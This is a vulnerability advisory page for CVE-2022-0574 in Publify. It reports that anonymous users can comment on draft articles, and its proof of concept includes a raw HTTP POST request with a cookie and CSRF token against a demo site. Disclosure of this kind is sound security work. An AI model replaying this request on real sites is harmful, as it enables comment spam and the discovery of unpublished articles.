Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrNhiephon6F322C84-9E20-4DF6-97E8-92BC271EDE3F
HistoryFeb 10, 2022 - 4:27 p.m.

Improper Access Control in publify/publify

2022-02-1016:27:20
nhiephon
www.huntr.dev
15
access control
anonymous comments
vulnerability detection
admin permission
csrf attack
comment spam

EPSS

0.001

Percentile

30.0%

JSON

Description

Article in draft mode can only be accessed by admins who have permission to manage article. Anonymous users can’t view but can leave comments on article in draft mode. The cause of the vulnerability is that the draft article is setting to comment enabled and create_comment function only checks for comment enabled/disabled, not whether check for article in draft or public mode.

Proof of Concept

  • Step 1: Login demo account in https://demo-publify.herokuapp.com/admin. Create article in draft mode and get the id.
  • Step 2: Visit website in anonymous mode, get cookie and CSRF token. Call this request with id of article in draft mode.
POST /comments?article_id=3281 HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=c908f541644f3d97dbf90e4ef273253b
Content-Length: 130
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
X-Csrf-Token: WHlz0364OOQtQuoHCuYkYeqBcxSgcp4xxj+gdu+z4dWXkwGhtLqZZgvy2j0YiQ1G+CJFiRdl3GlbO5w5ZxLkOg==
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://demo-publify.herokuapp.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

utf8=%E2%9C%93&comment%5Bauthor%5D=anon%40a.com&comment%5Burl%5D=&comment%5Bemail%5D=&comment%5Bbody%5D=anon+comment&submit=submit

Unpublish article: https://drive.google.com/file/d/17rev6klCS1zdY9zUU7umNjPJrpm8XU62

Create comment: https://drive.google.com/file/d/1iUJSmoqatVxtUdkU_6C_O9UP4Bkfsd9T

Impact

Anonymous users can leave comments on articles in draft mode. Attacker can also take advantage of the vulnerability to list the id of articles in draft mode. Run comment spam attack even if the app has disabled comments for all public articles.

Related

github 1
osv 3
nvd 1
cvelist 1
veracode 1
cve 1
rubygems 1
cnvd 1
prion 1
github
github
Publify Incorrect Authorization
2022-05-17 00:01:25
osv
osv
Publify Incorrect Authorization
2022-05-17 00:01:25
CVE-2022-0574
2022-05-16 15:15:08
BIT-publify-2022-0574
2024-03-06 11:04:02
nvd
nvd
CVE-2022-0574
2022-05-16 15:15:08
cvelist
cvelist
CVE-2022-0574 Improper Access Control in publify/publify
2022-05-16 14:31:39
veracode
veracode
Improper Access Control
2022-05-17 06:34:38
cve
cve
CVE-2022-0574
2022-05-16 15:15:08
rubygems
rubygems
Incorrect Authorization in publify
2022-05-16 21:00:00
cnvd
cnvd
Publify Access Control Error Vulnerability
2022-05-18 00:00:00
prion
prion
Improper access control
2022-05-16 15:15:00

EPSS

0.001

Percentile

30.0%

JSON
Related for 6F322C84-9E20-4DF6-97E8-92BC271EDE3F
github1osv3nvd1cvelist1veracode1cve1rubygems1cnvd1prion1